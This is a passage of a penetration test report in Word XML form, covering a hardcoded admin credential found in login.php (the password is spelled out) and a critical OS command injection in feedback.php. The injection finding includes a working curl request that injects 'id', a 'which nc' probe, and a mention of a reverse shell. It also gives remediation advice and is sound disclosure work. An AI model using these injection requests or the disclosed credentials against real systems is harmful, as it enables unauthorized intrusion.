    <w:p w14:paraId="47048266" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Submitting these exact credentials to the login endpoint returned an HTTP 200 response containing the string "success" and a JavaScript redirect to /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>log_in</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/admin/B00kYouRProFile.php, confirming the credentials are valid and accepted by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130B600B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Note: the password value stored in webpass.txt (F-01) differs from the hardcoded application password by letter case (b00ks vs B00ks); the credential disclosed directly in the source code is the one confirmed valid, not the wordlist entry on its own.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670496F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDED16" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumerate readable files/paths under the application web root to locate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3D1C96" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Review the disclosed source code to identify the hardcoded comparison logic and literal credential value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7E9E27" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Submit the exact username/password pair to the login endpoint via an HTTP POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00861B28" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Observe the "success" response and redirect to the admin/profile page, confirming validity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC90F8" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E23FDA" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The figure below shows the disclosed source code (via grep across the web root) containing the hardcoded credential check on line 6 of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B877A9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A54DAB3" wp14:editId="0456E756">
            <wp:extent cx="5905500" cy="3733800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="331943934" name="Picture 331943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733800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD347F0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 2. Source code disclosure showing the hardcoded credential comparison in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> == "username", password == "KeepR3ading@b00ks").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267BAF36" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD691B" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Hardcoded credentials embedded in application source code cannot be rotated through normal user/administrative processes and are trivially recoverable by anyone able to read the source file, whether through misconfiguration, source disclosure, backup files, or version control exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B61D62" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>In this engagement, the disclosed credentials granted access to an internal admin/profile page (see F-05), demonstrating a direct path from source disclosure to unauthorized application access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6291F3B8" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Risk Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143FBFC0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This is rated High because valid credentials were confirmed and led to access beyond the public application surface. It is not rated Critical because the account reached does not, on the evidence gathered, provide server-level administrative control beyond the profile page functionality observed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CABDD6C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185A6CAD" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Remove all hardcoded credentials from source code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6007E6D0" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement authentication against a securely stored, hashed credential store (e.g., using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/Argon2) rather than literal string comparison.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2E9BB8" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Enforce unique, non-default credentials, and rotate any credentials that may have been exposed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918B9BC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Restrict source code and backup file exposure through the web server (see also Appendix on directory enumeration findings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249A3D9C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="320" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">F-03 — OS Command Injection in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>feedback.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C3A5B1E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Severity: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F1D1D"/>
        </w:rPr>
        <w:t>CRITICAL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="6B7280"/>
        </w:rPr>
        <w:t xml:space="preserve">      CWE: CWE-78 (OS Command Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C678BE" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Asset: </w:t>
      </w:r>
      <w:r>
        <w:t>/root/images/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>feedback.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (parameter: path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1311F9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A56E87" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>feedback.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> endpoint accepts a "path" GET parameter that is passed unsafely to a system-level command execution function. This allows an unauthenticated attacker to execute arbitrary operating system commands in the context of the web server process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8DE830" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78116DA6" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>The vulnerable parameter (path) was identified via a hidden HTML comment on the page containing a Base64-encoded string (P3BhdGg=) that decodes to "?path=".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA86F04" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Supplying OS commands via this parameter (e.g., id, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, hostname, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -a, ls -la, which nc) resulted in successful execution, with output reflected in the HTTP response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB7D415" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmed output included </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=33(www-data) gid=33(www-data) groups=33(www-data), confirming command execution in the context of the Apache web server user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264FE520" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Reproduction Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6215B8A4" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Identify the hidden path parameter via the Base64-encoded HTML comment on the feedback page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7659585F" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Send a request </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>such as:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> curl -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "http://192.168.76.157/root/images/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>feedback.php?path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA02AD2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Observe the command output (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=33(www-data) ...) embedded in the HTTP response, confirming execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0797B34D" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C651DC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The figure below shows a clean, isolated confirmation request: the id command executed via the path parameter, with the HTTP 200 response containing the resulting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=33(www-data) output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103F4A4E" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="D1D5DB"/>
        </w:pBdr>
        <w:spacing w:before="120" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14F58DB6" wp14:editId="2B4A2CD3">
            <wp:extent cx="5905500" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1125398254" name="Picture 1125398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305050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67123C98" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 3. Confirmed OS command injection: curl request to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>feedback.php?path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">=id returning </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=33(www-data) gid=33(www-data) groups=33(www-data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AB7E24" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B130CA2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Arbitrary OS command execution as the www-data user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D88FB9" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This finding was directly leveraged to establish an interactive reverse shell (see F-04), providing an ongoing foothold on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E8334" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Depending on further privilege escalation (not achieved during this engagement — see F-07 and Section 7), this class of vulnerability can lead to full host compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECC10F2" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Risk Explanation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2F073" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>This is the most severe finding in the assessment: it requires no authentication, is trivially exploitable, and was confirmed to provide arbitrary command execution and an interactive shell. It is rated Critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF5222" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="220" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BE9A78" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Remove direct OS command execution based on user-supplied input. Prefer safe, purpose-built APIs instead of shell invocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1538EFAC" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If shell execution is unavoidable, strictly </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>validate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and allow-list input (e.g., only a fixed set of known-safe values), never pass raw user input to a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444F598C" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run the web application process with least </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>privilege, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> apply defense-in-depth controls (e.g., disabling unnecessary shell binaries, using containerization/sandboxing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332B3550" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Apply a Web Application Firewall (WAF) as a compensating control while remediation is implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA915A8" w14:textId="77777777" w:rsidR="00C64CEA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="320" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F2937"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
